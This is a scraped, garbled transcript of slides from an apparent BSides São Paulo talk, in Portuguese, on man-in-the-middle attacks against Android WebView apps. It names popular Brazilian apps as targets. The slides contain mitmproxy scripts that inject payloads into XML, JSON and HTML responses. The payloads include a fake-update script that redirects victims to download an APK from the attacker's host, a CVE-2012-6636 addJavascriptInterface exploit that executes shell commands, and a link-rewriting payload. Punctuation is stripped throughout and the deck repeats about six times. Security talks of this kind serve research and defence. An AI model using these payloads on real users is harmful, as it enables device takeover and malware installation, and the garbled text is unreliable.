ataques mitm a aplicativos android: abusando da confiança dos desenvolvedores
DESCRIPTION
Muitos aplicativos Android possuem instâncias da classe WebView e derivadas, a fim de processar e renderizar conteúdo Web (html, javascript , etc). Nessa apresentação vou explorar três possibilidades de se prejudicar o usuário, todas elas baseadas na não autenticação das informações devolvidas ao aplicativo. Vou ilustrar a palestra usuando aplicativos populares brasileiros.TRANSCRIPT
Security BSides Satildeo Paulo ed naovaitercopa
Ataques MITM a Aplicativos Android
Abusando da confianccedila dos desenvolvedores
Ivan Joker Jeukens
ivanjokerbrgmailcom
Menu
Conclusotildees
Motivaccedilatildeo
Setup operacional
Injetando
Payload 1
Payload 2
Payload 3
Praticidade
Conclusotildees
Nenhum aplicativo valida seus dados transmitidos
Soacute o https enche o saco
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Menu
Conclusotildees
Motivaccedilatildeo
Setup operacional
Injetando
Payload 1
Payload 2
Payload 3
Praticidade
Conclusotildees
Nenhum aplicativo valida seus dados transmitidos
Soacute o https enche o saco
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Conclusotildees
Nenhum aplicativo valida seus dados transmitidos
Soacute o https enche o saco
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
